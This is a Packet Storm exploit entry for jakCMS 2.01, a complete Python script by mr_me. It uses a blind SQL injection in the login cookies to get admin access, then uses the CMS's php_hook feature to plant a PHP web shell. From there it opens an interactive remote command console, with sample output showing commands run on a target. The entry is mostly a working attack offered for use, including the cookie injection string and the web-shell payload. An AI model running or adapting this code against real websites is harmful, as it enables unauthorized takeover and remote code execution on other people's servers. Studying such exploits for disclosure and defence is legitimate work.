jakCMS 2.01 Code Execution

2011-02-21T00:00:00
ID PACKETSTORM:98628
Type packetstorm
Reporter mr_me
Modified 2011-02-21T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
#  
# JAKCMS <= v2.01 Code Execution Exploit  
# Explanation:  
#  
# During the authentication process, a check is performed to ensure that the user accessing the page is not already logged in.  
# This process is done by validating the cookies set in the browser as 'JAK_COOKIE_NAME' and 'JAK_COOKIE_PASS'. If the cookies  
# are found to be set, then an SQL statement is executed to help validate if the user is logged in. This functionaility contains  
# a blind SQL Injection vulnerability, triggerable through both the 'JAK_COOKIE_NAME' and 'JAK_COOKIE_PASS' variables.  
#  
# If a valid query is provided and it returns a result set, then the user is granted access to the administrative console by setting  
# the session variable 'JAKLoggedIn' to true. Below is a snippet of code from the 'class/class.userlogin.php' page on lines 65-76  
# highlighting the vulnerable code.  
#  
# public static function jakChecklogged()  
# {  
# global $jakdb;  
# if ((isset($_COOKIE['JAK_COOKIE_NAME']) && isset($_COOKIE['JAK_COOKIE_PASS'])) || isset($_SESSION['JAKLoggedIn'])) {  
# $sql = 'SELECT * FROM '.DB_PREFIX.'user WHERE ((username = "'.COOKIE_NAME.'" AND password = "'.COOKIE_PASS.'") OR (sessi$  
# $result = $jakdb->query($sql);  
# if ($jakdb->affected_rows > 0) {  
# $row = $result->fetch_assoc();  
# $_SESSION['JAKLoggedIn'] = true;  
#  
# Additionally, functionality in the backend, allows an administrative user to add a "php_hook" whereby adding php content to a  
# page on the website. This allows an attacker essentially backdoor the website in a single request.  
#  
# [mr_me@pluto jak]$ python jakcmsCodeExecution.py -p localhost:8080 -t 192.168.1.7 -d /webapps/jak/  
#  
# | ------------------------------------------- |  
# | JAKcms <= v2.01 0day Code Execution Explo!t |  
# | by mr_me - net-ninja.net ------------------ |  
#  
# (+) Testing proxy @ localhost:8080.. proxy is found to be working!  
# (+) Targeting http://192.168.1.7/  
# (!) Exploit working!  
# (+) Entering interactive remote console (q for quit)  
#  
# mr_me@192.168.1.7# id  
# uid=33(www-data) gid=33(www-data) groups=33(www-data)  
#  
# mr_me@192.168.1.7# uname -a  
# Linux steven-desktop 2.6.32-28-generic #55-Ubuntu SMP Mon Jan 10 21:21:01 UTC 2011 i686 GNU/Linux  
#  
# mr_me@192.168.1.7# q   
  
import sys  
import urllib  
import re  
import urllib2  
import getpass  
import base64  
from optparse import OptionParser  
  
usage = "./%prog [<options>] -t [target] -d [directory]"  
usage += "\nExample: ./%prog -p localhost:8080 -t 192.168.1.7 -d /webapps/jak/"  
  
parser = OptionParser(usage=usage)  
parser.add_option("-p", type="string",action="store", dest="proxy",  
help="HTTP Proxy <server:port>")  
parser.add_option("-t", type="string", action="store", dest="target",  
help="The Target server <server:port>")  
parser.add_option("-d", type="string", action="store", dest="dirPath",  
help="Directory path to the CMS")  
  
(options, args) = parser.parse_args()  
  
def banner():  
print "\n\t| -------------------------------------- |"  
print "\t| JAKcms <= v2.01 Code Execution Explo!t |"  
print "\t| by mr_me - net-ninja.net ------------- |\n"  
  
if len(sys.argv) < 5:  
banner()  
parser.print_help()  
sys.exit(1)  
  
def testProxy():  
check = 1  
sys.stdout.write("(+) Testing proxy @ %s.. " % (options.proxy))  
sys.stdout.flush()  
try:  
req = urllib2.Request("http://www.google.com/")  
req.set_proxy(options.proxy,"http")  
check = urllib2.urlopen(req)  
except:  
check = 0  
pass  
if check != 0:  
sys.stdout.write("proxy is found to be working!\n")  
sys.stdout.flush()  
else:  
print "proxy failed, exiting.."  
sys.exit(1)  
  
def interactiveAttack():  
print "(+) Entering interactive remote console (q for quit)\n"  
hn = "%s@%s# " % (getpass.getuser(), options.target)  
preBaseCmd = ""  
while preBaseCmd != 'q':  
preBaseCmd = raw_input(hn)  
cmd64 = base64.b64encode(preBaseCmd)  
cmdResp = getServerResponse(options.target + options.dirPath + "index.php?p=sitemap&lol=" + cmd64, "", "")  
result = cmdResp.split("<!DOCTYPE html")[0]  
print result  
  
def getServerResponse(exploit, header=None, data=None):  
try:  
if header != None:  
headers = {}  
headers['Cookie'] = header  
if data != None:  
data = urllib.urlencode(data)  
req = urllib2.Request("http://"+exploit, data, headers)  
if options.proxy:  
req.set_proxy(options.proxy,"http")  
check = urllib2.urlopen(req).read()   
except urllib.error.HTTPError, error:  
check = error.read()  
except urllib.error.URLError:  
print "(-) Target connection failed, check your address"  
sys.exit(1)  
return check  
  
def doEvilRequest():  
print "(+) Targeting http://%s/" % (options.target)  
phpShell = "system(base64_decode($_GET['lol']));"  
req = options.target + options.dirPath + "admin/index.php?p=plugins&sp=newhook"  
funnycookie = "JAK_COOKIE_PASS=test; JAK_COOKIE_NAME=admin\"))+and+1=1--+;"  
data = {'jak_name':'lol', 'jak_hook':'php_sitemap', 'jak_plugin':'0', 'jak_exorder':'1', 'jak_phpcode': phpShell}  
check = getServerResponse(req, funnycookie, data)  
  
if re.search("Successful", check):  
print "(!) Exploit working!"  
interactiveAttack()  
else:  
print "(-) Exploit failed, exiting.."  
sys.exit(1)  
  
def main():  
banner()  
if options.proxy:  
testProxy()  
doEvilRequest()  
  
if __name__ == "__main__":  
main()  
  
`